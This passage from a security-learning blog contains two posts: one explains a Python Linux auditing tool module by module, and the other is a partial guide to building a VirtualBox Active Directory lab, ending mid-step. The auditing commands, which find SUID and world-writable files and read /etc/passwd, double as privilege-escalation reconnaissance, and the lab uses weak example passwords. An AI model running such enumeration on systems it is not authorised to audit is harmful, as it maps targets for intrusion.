your files change, you don't know when your system is compromised.</p> <p>The full source code is a single self-contained Python file. Drop it on any system with Python 3.8+ and you're ready to go.</p> python linux cybersecurity devops Day 18 — Building a Linux Vulnerability Analyzer Hafiz Shamnad Fri, 06 Mar 2026 05:35:21 +0000 https://forem.com/hafiz_shamnad/day-18-building-a-linux-vulnerability-analyzer-895 https://forem.com/hafiz_shamnad/day-18-building-a-linux-vulnerability-analyzer-895 <p>In most cybersecurity learning paths, people focus on tools first. But sometimes the better exercise is building your own. Today I spent time creating a Linux vulnerability analyzer, a command line tool designed to audit a system and surface common security weaknesses.</p> <p>The idea is simple: treat the Linux machine like a fortress and walk through it gate by gate. Which services are listening? Which configurations are unsafe? Which permissions look suspicious? A small script can turn those questions into a structured security check.</p> <p>This tool performs a set of system audits that are commonly part of basic security assessments. It collects system information, inspects open ports, reviews SSH configuration, checks firewall status, enumerates user accounts, and looks for risky file permissions such as world writable files or SUID binaries. It also inspects running services and identifies available package updates that might contain security patches.</p> <p>What made this project interesting was designing it as a modular scanner. Each security check is treated as its own module, so scans can run individually or as part of a full system audit. This makes it easier to extend later with additional checks such as CVE lookups, Docker scanning, or kernel vulnerability analysis.</p> <p>Another focus was usability. Security tools are most useful when their output is readable, so the scanner produces a structured CLI report with clear sections and warning indicators. Instead of raw command outputs, the results are organized into human readable summaries that highlight potential issues quickly.</p> <p>At the end of the scan, the tool generates a concise security overview and can optionally export the findings as a JSON report for further analysis or automation workflows.</p> <p>Projects like this help reinforce how many security insights come directly from the operating system itself. Linux already exposes a lot of valuable signals through logs, configuration files, and system commands. The challenge is collecting and presenting them in a meaningful way.</p> <p>Building small security utilities like this is a great way to understand how real auditing tools work under the hood.</p> <p>Day by day, the goal is simple: learn by building.</p> <h3> Detailed Code Explanation </h3> <p><code>vulnscan</code> is a <strong>Python-based command-line security auditing tool</strong> designed to analyze Linux desktops and servers for common security issues.</p> <p>It performs several checks including:</p> <ul> <li>System information collection</li> <li>Open port discovery</li> <li>SSH configuration audit</li> <li>Firewall status verification</li> <li>User account analysis</li> <li>World-writable file detection</li> <li>SUID binary detection</li> <li>Failed login detection</li> <li>Running service enumeration</li> <li>Package update checks</li> </ul> <p>The results are displayed in a <strong>structured CLI interface</strong> and can also be exported as <strong>JSON reports</strong>.</p> <h1> 1. Shebang and Script Header </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1">#!/usr/bin/env python3 </span></code></pre> </div> <p>This line tells Linux to run the script using <strong>Python 3 from the system environment</strong>.</p> <p>The header comment explains the tool:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vulnscan - Linux Vulnerability Analyzer A comprehensive security auditing tool with rich CLI output </code></pre> </div> <p>This indicates the tool is designed to produce <strong>clean terminal output using the Rich library</strong>.</p> <h1> 2. Importing Required Modules </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">subprocess</span> <span class="kn">import</span> <span class="n">argparse</span> <span class="kn">import</span> <span class="n">sys</span> <span class="kn">import</span> <span class="n">os</span> <span class="kn">import</span> <span class="n">json</span> <span class="kn">import</span> <span class="n">datetime</span> <span class="kn">from</span> <span class="n">pathlib</span> <span class="kn">import</span> <span class="n">Path</span> </code></pre> </div> <p>Each module serves a purpose:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Module</th> <th>Purpose</th> </tr> </thead> <tbody> <tr> <td>subprocess</td> <td>Run Linux shell commands</td> </tr> <tr> <td>argparse</td> <td>Handle CLI arguments</td> </tr> <tr> <td>os</td> <td>File permission checks</td> </tr> <tr> <td>json</td> <td>Export scan results</td> </tr> <tr> <td>datetime</td> <td>Timestamp scans</td> </tr> <tr> <td>pathlib</td> <td>File path handling</td> </tr> </tbody> </table></div> <p>The scanner relies heavily on <strong>Linux commands executed via subprocess</strong>.</p> <h1> 3. Rich CLI Output Support </h1> <p>The tool attempts to import the <strong>Rich library</strong>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">rich.console</span> <span class="kn">import</span> <span class="n">Console</span> <span class="kn">from</span> <span class="n">rich.table</span> <span class="kn">import</span> <span class="n">Table</span> <span class="kn">from</span> <span class="n">rich.panel</span> <span class="kn">import</span> <span class="n">Panel</span> </code></pre> </div> <p>Rich allows:</p> <ul> <li>colored output</li> <li>tables</li> <li>progress spinners</li> <li>formatted panels</li> </ul> <p>If Rich is <strong>not installed</strong>, the tool falls back to <strong>plain text mode</strong>.</p> <p>Example fallback logic:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">except</span> <span class="nb">ImportError</span><span class="p">:</span> <span class="n">RICH</span> <span class="o">=</span> <span class="bp">False</span> </code></pre> </div> <p>A simple console class replaces Rich output.</p> <p>This ensures the tool <strong>works even on minimal systems</strong>.</p> <h1> 4. Command Execution Helper </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="n">cmd</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">str</span><span class="p">:</span> </code></pre> </div> <p>This function runs shell commands safely.</p> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">subprocess</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">capture_output</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> </code></pre> </div> <p>Features:</p> <ul> <li>Captures stdout</li> <li>Prevents crashes</li> <li>Timeout protection</li> <li>Always returns output</li> </ul> <p>Example usage:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>run("uname -r") </code></pre> </div> <p>Output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>6.5.0-21-generic </code></pre> </div> <h1> 5. Status Tag Generator </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">_tag</span><span class="p">(</span><span class="n">ok</span><span class="p">:</span> <span class="nb">bool</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">str</span><span class="p">:</span> </code></pre> </div> <p>Creates <strong>status labels</strong> for results.</p> <p>Examples:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>✔ OK ✗ WARN </code></pre> </div> <p>Used when displaying scan results.</p> <h1> 6. Section Header Printer </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">_section</span><span class="p">(</span><span class="n">title</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> </code></pre> </div> <p>Creates <strong>visual separation between scan sections</strong>.</p> <p>Example output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>────────────────── SSH Security Audit ────────────────── </code></pre> </div> <h1> 7. System Information Scan </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">system_info</span><span class="p">()</span> </code></pre> </div> <p>Collects <strong>basic system information</strong>.</p> <p>Commands used:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Command</th> <th>Purpose</th> </tr> </thead> <tbody> <tr> <td>grep PRETTY_NAME /etc/os-release</td> <td>OS name</td> </tr> <tr> <td>uname -r</td> <td>kernel version</td> </tr> <tr> <td>uname -m</td> <td>architecture</td> </tr> <tr> <td>hostname</td> <td>system hostname</td> </tr> <tr> <td>uptime -p</td> <td>system uptime</td> </tr> <tr> <td>free -h</td> <td>RAM</td> </tr> <tr> <td>df -h</td> <td>disk usage</td> </tr> <tr> <td>who</td> <td>logged in users</td> </tr> </tbody> </table></div> <p>Example output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>OS: Ubuntu 22.04 Kernel: 6.2 RAM: 8GB Disk: 40% used </code></pre> </div> <p>This helps identify <strong>outdated or unsupported systems</strong>.</p> <h1> 8. Open Port Detection </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">open_ports</span><span class="p">()</span> </code></pre> </div> <p>Uses:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>ss -tuln </code></pre> </div> <p>This lists:</p> <ul> <li>TCP ports</li> <li>UDP ports</li> <li>listening services</li> </ul> <p>Example output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>tcp LISTEN 0.0.0.0:22 tcp LISTEN 0.0.0.0:80 </code></pre> </div> <p>Open ports can expose services to attackers.</p> <h1> 9. SSH Security Audit </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">ssh_audit</span><span class="p">()</span> </code></pre> </div> <p>Analyzes <code>/etc/ssh/sshd_config</code>.</p> <p>Checks include:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Setting</th> <th>Risk</th> </tr> </thead> <tbody> <tr> <td>PermitRootLogin</td> <td>attackers login as root</td> </tr> <tr> <td>PasswordAuthentication</td> <td>brute force risk</td> </tr> <tr> <td>PermitEmptyPasswords</td> <td>empty password accounts</td> </tr> <tr> <td>Protocol</td> <td>insecure SSH v1</td> </tr> <tr> <td>MaxAuthTries</td> <td>brute force attempts</td> </tr> <tr> <td>LoginGraceTime</td> <td>session hijacking window</td> </tr> </tbody> </table></div> <p>Example result:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>PermitRootLogin = yes WARN PasswordAuthentication = yes WARN Protocol = 2 OK </code></pre> </div> <p>This helps detect <strong>weak SSH configurations</strong>.</p> <h1> 10. Firewall Status Check </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">firewall_check</span><span class="p">()</span> </code></pre> </div> <p>Checks three firewall systems:</p> <h3> UFW </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>ufw status </code></pre> </div> <h3> iptables </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>iptables -L INPUT </code></pre> </div> <h3> firewalld </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>systemctl is-active firewalld </code></pre> </div> <p>Example result:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>UFW: inactive iptables rules: 3 firewalld: inactive </code></pre> </div> <p>A disabled firewall is a <strong>major security risk</strong>.</p> <h1> 11. User Account Audit </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">user_audit</span><span class="p">()</span> </code></pre> </div> <p>Reads:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/etc/passwd </code></pre> </div> <p>Extracts:</p> <ul> <li>username</li> <li>UID</li> <li>home directory</li> <li>shell</li> </ul> <p>Important checks:</p> <ul> <li>interactive shells</li> <li>sudo users</li> <li>root accounts</li> </ul> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>user1 uid=1000 shell=/bin/bash root uid=0 sudo </code></pre> </div> <p>Privilege escalation often targets <strong>misconfigured user accounts</strong>.</p> <h1> 12. World Writable File Scan </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">world_writable</span><span class="p">()</span> </code></pre> </div> <p>Runs:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>find / -perm -0002 </code></pre> </div> <p>This identifies files <strong>any user can modify</strong>.</p> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/tmp/testfile </code></pre> </div> <p>These files can be abused for <strong>privilege escalation</strong>.</p> <h1> 13. SUID Binary Detection </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">suid_files</span><span class="p">()</span> </code></pre> </div> <p>Command:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>find / -perm -4000 </code></pre> </div> <p>SUID files execute <strong>with root privileges</strong>.</p> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/usr/bin/passwd /usr/bin/sudo </code></pre> </div> <p>Attackers often exploit vulnerable SUID binaries.</p> <h1> 14. Failed Login Detection </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">failed_logins</span><span class="p">()</span> </code></pre> </div> <p>Checks:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>lastb </code></pre> </div> <p>If unavailable:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>journalctl sshd </code></pre> </div> <p>This identifies <strong>brute force attempts</strong>.</p> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Failed password for root from 192.168.1.10 </code></pre> </div> <h1> 15. Running Services </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">running_services</span><span class="p">()</span> </code></pre> </div> <p>Uses:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>systemctl list-units --type=service </code></pre> </div> <p>Example output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>ssh.service nginx.service mysql.service </code></pre> </div> <p>Attack surface increases with <strong>more running services</strong>.</p> <h1> 16. Package Update Check </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">package_updates</span><span class="p">()</span> </code></pre> </div> <p>Detects package manager automatically:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Manager</th> <th>Command</th> </tr> </thead> <tbody> <tr> <td>APT</td> <td>apt list --upgradable</td> </tr> <tr> <td>DNF/YUM</td> <td>dnf check-update</td> </tr> </tbody> </table></div> <p>Example result:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Upgradable packages: 12 Security updates: 3 </code></pre> </div> <p>Outdated packages often contain <strong>known CVEs</strong>.</p> <h1> 17. Display Functions </h1> <p>Several display functions format scan results.</p> <p>Examples:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>display_ports() display_users() display_services() </code></pre> </div> <p>When Rich is enabled, results appear as <strong>tables</strong>.</p> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Proto State Address tcp LISTEN 0.0.0.0:22 </code></pre> </div> <h1> 18. Scan Summary </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">display_summary</span><span class="p">()</span> </code></pre> </div> <p>Counts warnings such as:</p> <ul> <li>insecure SSH settings</li> <li>world writable files</li> </ul> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Scan completed: 2026-03-06 10:20 Warnings found: 4 </code></pre> </div> <h1> 19. JSON Export </h1> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">export_json</span><span class="p">()</span> </code></pre> </div> <p>Allows exporting scan results:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vulnscan --export report.json </code></pre> </div> <p>Example output file:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>{ "ssh": {...}, "ports": {...} } </code></pre> </div> <p>Useful for:</p> <ul> <li>automation</li> <li>SIEM ingestion</li> <li>reporting</li> </ul> <h1> 20. CLI Argument Parsing </h1> <p>Handled using <strong>argparse</strong>.</p> <p>Example commands:</p> <p>Run full scan<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vulnscan </code></pre> </div> <p>Run specific modules<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vulnscan -m ssh firewall ports </code></pre> </div> <p>Export report<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vulnscan --export report.json </code></pre> </div> <p>List modules<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vulnscan --list </code></pre> </div> <p>Quiet mode<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>vulnscan -q </code></pre> </div> <h1> 21. Module System </h1> <p>Modules are defined in a dictionary:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">MODULES</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">system</span><span class="sh">"</span><span class="p">:</span> <span class="n">system_info</span><span class="p">,</span> <span class="sh">"</span><span class="s">ports</span><span class="sh">"</span><span class="p">:</span> <span class="n">open_ports</span> <span class="p">}</span> </code></pre> </div> <p>This makes the scanner <strong>modular and extensible</strong>.</p> <p>Adding new checks becomes easy.</p> <h1> 22. Main Function </h1> <p>The main function orchestrates everything:</p> <ol> <li>Parse CLI arguments</li> <li>Select modules</li> <li>Run scans</li> <li>Display results</li> <li>Export report</li> </ol> <p>Flow:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Parse arguments ↓ Run selected modules ↓ Display results ↓ Export report (optional) </code></pre> </div> <h1> Final Outcome </h1> <p><code>vulnscan</code> provides a <strong>quick security overview of a Linux system</strong>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fllax903f44w390f4iioj.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fllax903f44w390f4iioj.png" alt=" " width="800" height="313"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxae9ts2agia80752js30.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxae9ts2agia80752js30.png" alt=" " width="800" height="197"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fucesbd1r4hp7vgcpq0qs.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fucesbd1r4hp7vgcpq0qs.png" alt=" " width="800" height="341"></a></p> <p>Capabilities include:</p> <ul> <li>System auditing</li> <li>SSH security analysis</li> <li>Firewall detection</li> <li>Port discovery</li> <li>Permission checks</li> <li>User privilege analysis</li> <li>Service enumeration</li> <li>Package update checks</li> </ul> <h1> Possible Future Improvements </h1> <p>To make the tool even more powerful:</p> <ul> <li>CVE lookup via NVD API</li> <li>Docker container scanning</li> <li>Cron job auditing</li> <li>Kernel vulnerability detection</li> <li>Risk scoring engine</li> <li>HTML security reports</li> <li>CIS benchmark checks</li> </ul> <h3> Summary </h3> <p>Tools that analyze Linux security often look similar on the surface, but they are built for very different moments in a security workflow.</p> <p>My <strong>Linux vulnerability analyzer</strong> focuses on <strong>security auditing and system hygiene</strong>. It checks things like SSH configuration, firewall status, open ports, user privileges, file permissions, and available package updates. The goal is to give administrators or learners a clear overview of how securely a system is configured and highlight areas that need improvement.</p> <p>In contrast, <strong>LinPEAS</strong> is designed for a completely different scenario. It is used after an attacker or penetration tester already has access to a machine and wants to discover <strong>privilege escalation paths</strong>. Instead of auditing configuration health, it searches aggressively for ways to gain higher privileges such as sudo misconfigurations, writable services, exposed credentials, or kernel exploits.</p> <p>So while both tools analyze a Linux system, their goals differ:</p> <ul> <li>A vulnerability analyzer helps <strong>defenders audit and harden systems</strong>.</li> <li>LinPEAS helps <strong>attackers or penetration testers find ways to escalate privileges</strong>.</li> </ul> <p>Understanding this distinction is important because security is not just about breaking systems, but also about <strong>building and maintaining them securely</strong>.</p> linux programming python cybersecurity Every Hacker Should Build This Active Directory Lab Hafiz Shamnad Thu, 05 Mar 2026 12:34:47 +0000 https://forem.com/hafiz_shamnad/every-hacker-should-build-this-active-directory-lab-3bo4 https://forem.com/hafiz_shamnad/every-hacker-should-build-this-active-directory-lab-3bo4 <p>Hey folks, if you're dipping your toes into cybersecurity—whether you're a red teamer plotting simulated breaches, a blue teamer hardening defenses, or just a curious sysadmin wannabe—you've probably heard the hype around Active Directory (AD). It's the beating heart of most enterprise networks, handling authentication, authorization, and a whole lot of "oops, why did that user just get god-mode access?" moments.</p> <p>But here's the kicker: reading about AD in a book or watching a YouTube tutorial is like learning to swim by watching Olympic highlights. It's dry, it's theoretical, and it doesn't stick. That's why, a few months back, I rolled up my sleeves and built my own AD lab right on my beat-up laptop using nothing but VirtualBox. No fancy cloud credits, no corporate budget—just me, some free ISOs, and a caffeine-fueled weekend.</p> <p>The payoff? I finally <em>got</em> it. I saw a Windows client pinging the domain controller, slurping up an IP via DHCP, and joining the domain like it was the easiest thing in the world. It felt like casting a spell that actually worked. And when I "accidentally" locked out a test user? Fixing it taught me more about Kerberos tickets than any certification exam ever could.</p> <p>If you're serious about hacking (ethically, of course), this lab is non-negotiable. It's your sandbox for everything from lateral movement exploits to GPO misconfigurations. In this guide, I'll walk you through every gritty detail—step by step—so you can replicate it without pulling your hair out. Let's turn your laptop into a mini-enterprise and break some (virtual) stuff.</p> <h1> Why Bother with a Home AD Lab? </h1> <p>Before we dive in, quick reality check: AD powers 95% of Fortune 500 companies. If you're aiming for pentesting certs like OSCP or eJPT, or just want to level up your SOC skills, hands-on AD experience is gold. In my lab, I tinkered with domain controllers, user enumeration, and even simulated a Pass-the-Hash attack (spoiler: it worked terrifyingly well).</p> <p>This setup is lightweight—runs on a mid-range laptop with 8GB RAM—and costs zilch if you snag eval versions. Pro tip: Treat it like a hacker's playground. Break it, rebuild it, repeat.</p> <h1> Lab Blueprint: What We're Building </h1> <p>Two VMs, one internal network, endless chaos potential:</p> <p><strong>1. Domain Controller (DC) – The Boss Machine</strong></p> <ul> <li> <strong>OS</strong>: Windows Server 2019 (Desktop Experience for that GUI goodness)</li> <li> <strong>Roles</strong>: AD DS (Domain Services), DNS, DHCP, Routing &amp; Remote Access (RRAS) for NAT</li> <li> <strong>Specs</strong>: 2 vCPUs, 2GB RAM, 60GB disk</li> <li> <strong>IP Setup</strong>: Internal: 172.16.0.1/24 (static), NAT for outbound internet</li> </ul> <p><strong>2. Client Workstation – The Gullible Minion</strong></p> <ul> <li> <strong>OS</strong>: Windows 10 Pro</li> <li> <strong>Role</strong>: Joins the domain, tests auth flows</li> <li> <strong>Specs</strong>: 2 vCPUs, 2GB RAM, 40GB disk</li> <li> <strong>IP Setup</strong>: Dynamic via DHCP (172.16.0.x range)</li> </ul> <p>Networking twist: Internal network for VM-to-VM chatter, NAT for the DC to phone home for updates. No host involvement—keeps it isolated and hack-proof.</p> <p>Tools you'll need:</p> <ul> <li> <strong>VirtualBox 7.x</strong> (free from oracle.com/virtualbox)</li> <li> <strong>PowerShell</strong> (built into Windows, but we'll script like pros)</li> <li>ISOs: Windows Server 2019 and Win10 eval from <a href="https://www.microsoft.com/en-us/evalcenter" rel="noopener noreferrer">Microsoft's site</a> (search "evaluation center")</li> </ul> <h1> Step 1: Gear Up VirtualBox </h1> <p>Fire up your browser and grab VirtualBox + the Extension Pack. The pack unlocks USB passthrough and better USB2/3 support—handy if you ever want to "plug in" a virtual thumb drive for some USB-based fun.</p> <p>Install like any app: Run the EXE, accept defaults, reboot if it nags. Launch it, and boom—you're in the Oracle VM VirtualBox Manager. If you're on a Mac or Linux host, same drill; it plays nice cross-platform.</p> <p>Pitfall alert: If your antivirus freaks out (looking at you, Windows Defender), add VirtualBox to exclusions. False positives are the worst buzzkill.</p> <h1> Step 2: Snag Those Sweet ISOs </h1> <p>Head to Microsoft's Evaluation Center:</p> <ul> <li> <a href="https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2019" rel="noopener noreferrer">Windows Server 2019</a> – Pick the ISO, ~5GB download.</li> <li> <a href="https://www.microsoft.com/en-us/evalcenter/evaluate-windows-10-enterprise" rel="noopener noreferrer">Windows 10</a> – Enterprise edition for domain join perks.</li> </ul> <p>Save 'em to a folder like <code>C:\ISOs</code>. These evals last 180 days—plenty of time to wreak havoc. (Ethical note: Don't deploy in prod; that's a lawsuit waiting to happen.)</p> <h1> Step 3: Spin Up the DC VM </h1> <p>In VirtualBox:</p> <ul> <li> <strong>New</strong> &gt; Name it "DC01", Type: Microsoft Windows, Version: Windows 2019 (64-bit).</li> <li> <strong>Memory</strong>: 2048MB (slider it up if you've got 16GB+ host RAM).</li> <li> <strong>Hard Disk</strong>: Create a virtual hard disk now, VDI format, dynamically allocated, 60GB.</li> <li> <strong>Processors</strong>: 2 CPUs under System tab.</li> </ul> <p>Hit <strong>Start</strong> later; we'll tweak networking first. This config mimics a beefy server without hogging your laptop's guts.</p> <h1> Step 4: Wire the Network Like a Pro </h1> <p>VM Settings &gt; Network:</p> <ul> <li> <strong>Adapter 1</strong>: Enable, Attached to: NAT (for internet yumminess—updates, pings to google.com).</li> <li> <strong>Adapter 2</strong>: Enable, Attached to: Internal Network. Name it "LABNET" (customize this; it'll be your isolated bubble).</li> </ul> <p>Under General &gt; Advanced:</p> <ul> <li>Shared Clipboard: Bidirectional</li> <li>Drag'n'Drop: Bidirectional</li> </ul> <p>Why two adapters? NAT keeps the DC worldly, Internal keeps lab traffic private. Test it post-install: From the DC, <code>ping 8.8.8.8</code> should work; client-to-DC pings will too once joined.</p> <p>Common gotcha: If VMs can't see each other, double-check the Internal Network name matches on both.</p> <h1> Step 5: Breathe Life into the Server </h1> <p>Settings &gt; Storage &gt; Controller: IDE &gt; Empty &gt; Optical Drive icon &gt; Choose the Server 2019 ISO.</p> <p>Start the VM. Boot menu: Hit Enter on the ISO. Install <strong>Windows Server 2019 Standard (Desktop Experience)</strong>—the GUI makes life easier for noobs.</p> <p>Partition: Custom, use the full 60GB. Setup wizard: Local admin password something memorable like <code>P@ssw0rd123!</code>. It'll chug for 10-15 mins. Grab a coffee.</p> <h1> Step 6: First Login Tango </h1> <p>VM boots to login screen? No shortcuts here—VirtualBox doesn't auto-map Ctrl+Alt+Del. Go <strong>Input &gt; Keyboard &gt; Insert Ctrl+Alt+Del</strong>.</p> <p>Username: Administrator, password from setup. Desktop loads—welcome to server land. Quick win: Right-click Start &gt; Windows PowerShell (Admin) to feel powerful.</p> <h1> Step 7: Tame the Network Adapters </h1> <p>Search "View Network Connections". You'll see "Ethernet" x2—one with a 169.254.x.x APIPA (no DHCP yet), the other maybe similar.</p> <p>Right-click each &gt; Status &gt; Details. The NAT one might have a 10.x.x.x from VirtualBox's router.</p> <p>Rename 'em: Alt+Enter on each &gt; Properties &gt; Alt+Enter on "Local Area Connection" &gt; Description field: "Internet Adapter" and "Internal Adapter".</p> <p>Why bother? Scripts and docs get confusing with generic names. Trust me, future-you thanks present-you.</p> <h1> Step 8: Lock Down That Static IP </h1> <p>Right-click Internal Adapter &gt; Properties &gt; Internet Protocol Version 4 (TCP/IPv4) &gt; Properties.</p> <ul> <li>IP: 172.16.0.1</li> <li>Subnet: 255.255.255.0</li> <li>Default Gateway: Leave blank (no upstream router yet)</li> <li>DNS: 127.0.0.1 (self-hosted, baby!)</li> </ul> <p>Apply. <code>ipconfig</code> in CMD should show it. Ping yourself: <code>ping 172.16.0.1</code>—loopback magic.</p> <p>Pro tip: 172.16.0.0/24 is RFC 1918 private—safe for labs, won't clash with your home WiFi.</p> <h1> Step 9: Summon Active Directory </h1> <p>Server Manager (pops on login) &gt; Dashboard &gt; Quick Start &gt; Add roles and features.</p> <p>Wizard: Role-based &gt; This server &gt; Next &gt; Check <strong>Active Directory Domain Services</strong> &gt; Add features when prompted (includes management tools—yay GPOs!).</p> <p>Install. It'll download bits if NAT's working. ~5 mins.</p> <h1> Step 10: Crown the King—Promote to DC </h1> <p>Post-install, yellow flag in Server Manager &gt; Click &gt; Promote this server to a domain controller.</p> <ul> <li>Deployment: Add a new forest</li> <li>Root domain: <code>myfirstdomain.com</code> (keep it simple; .local works too, but .com feels enterprise-y)</li> <li>DSRM password: Something strong like <code>R3c0v3ryP@ss!</code> </li> <li>DNS: Let it install</li> <li>NetBIOS: MYFIRSTDOMAIN (auto-fills)</li> </ul> <p>Paths: Default. Review, install. Reboot incoming—save your work!</p> <p>Post-reboot: Login as <code>MYFIRSTDOMAIN\Administrator</code>. DNS is now AD-integrated—test <code>nslookup myfirstdomain.com</code> (should resolve to 172.16.0.1).</p> <h1> Step 11: Populate the Kingdom—Users &amp; OUs </h1> <p>Server Manager &gt; Tools &gt; Active Directory Users and Computers (dsa.msc).</p> <p>Right-click domain &gt; New &gt; Organizational Unit: "Users", "IT Dept", "Sales" (OUs group users for GPOs later).</p> <p>New &gt; User: <code>jdoe</code>, full name John Doe, password <code>P@ssw0rd123</code>, uncheck "User must change". Boom—domain citizen.</p> <p>Scale it: Right-click OU &gt; New &gt; User, rinse. Or... PowerShell time (next step).</p> <h1> Step 12: Bridge to the Outside World—RRAS </h1> <p>Server Manager &gt; Add roles &gt; Remote Access &gt; DirectAccess and VPN (RAS), Routing.</p> <p>Install. Post-reboot: Server Manager &gt; Tools &gt; Routing and Remote Access.</p> <p>Right-click server name &gt; Configure &gt; Custom &gt; LAN routing only &gt; IPv4 &gt; NAT.</p> <p>Right-click NAT 